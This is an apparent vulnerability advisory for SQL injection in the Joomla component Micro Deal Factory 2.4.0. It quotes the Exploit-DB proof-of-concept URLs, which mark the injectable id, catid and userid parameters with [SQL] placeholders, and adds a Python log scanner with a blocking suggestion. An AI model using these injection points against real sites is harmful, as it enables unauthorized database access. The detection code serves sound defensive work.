Vendor: Micro Deal Factory
By: Ihsan Sencan
CVSS: 7.5 (HIGH)
CWE: SQL Injection
Product Name: Micro Deal Factory
Affected Version From: 2.4.2000
Affected Version To: 2.4.2000
Patch Exists: NO
Related CWE:
CPE: a:thephpfactory:micro_deal_factory:2.4.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 (x64), Kali Linux (x64)
Year: 2018

Joomla! Component Micro Deal Factory 2.4.0 – ‘id’ SQL Injection

The Joomla! Component Micro Deal Factory version 2.4.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting SQL code into the 'id' parameter of various URLs, potentially gaining unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Micro Deal Factory component.

Exploit-DB raw data:

# Exploit Title: Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/micro-deal-factory/
# Version: 2.4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
http://localhost/[PATH]/index.php?option=com_microdealfactory&task=dealdetail&id=[SQL]
http://localhost/[PATH]/my-deals/mydeals/catid,15[SQL]/other
http://localhost/[PATH]/component/microdealfactory/listdeals/userid,44[SQL]/user01
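
A detection check for the three URL shapes listed in the PoC above, added here as an example and not part of the original advisory or the Exploit-DB entry: it flags requests whose id, catid or userid value is not a plain integer. It assumes these parameters are meant to be numeric (as the 15 and 44 in the PoC suggest) and that the web server writes combined-format access logs; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# SEF-style segments from the advisory's URLs: /catid,15/ and /userid,44/
SEF_PARAM = re.compile(r"/(catid|userid),([^/]*)")
# Assumption: id, catid and userid are integer keys, so anything else is suspect.
INTEGER = re.compile(r"[0-9]+")


def suspicious_params(url):
    """Return [(name, value)] for component parameters that are not plain integers."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    found = []
    if "com_microdealfactory" in query.get("option", []):
        found += [("id", value) for value in query.get("id", [])]
    found += SEF_PARAM.findall(unquote(parts.path))
    return [(name, value) for name, value in found if not INTEGER.fullmatch(value)]


def scan(log_lines):
    """Return [(client_ip, hits)] for every log line with a non-integer parameter."""
    alerts = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line we understand
        hits = suspicious_params(match.group(1))
        if hits:
            alerts.append((line.split()[0], hits))
    return alerts


# Constructed sample log lines (documentation IP ranges, harmless non-numeric values).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Sep/2018:10:00:01 +0000] "GET /index.php?option=com_microdealfactory&task=dealdetail&id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [24/Sep/2018:10:00:05 +0000] "GET /index.php?option=com_microdealfactory&task=dealdetail&id=12%20x HTTP/1.1" 500 310',
    '203.0.113.9 - - [24/Sep/2018:10:00:09 +0000] "GET /my-deals/mydeals/catid,15x/other HTTP/1.1" 500 310',
    '198.51.100.7 - - [24/Sep/2018:10:00:12 +0000] "GET /component/microdealfactory/listdeals/userid,44/user01 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

The same integer test can be used as a blocking rule at a reverse proxy or WAF in front of the site while no patched release is listed.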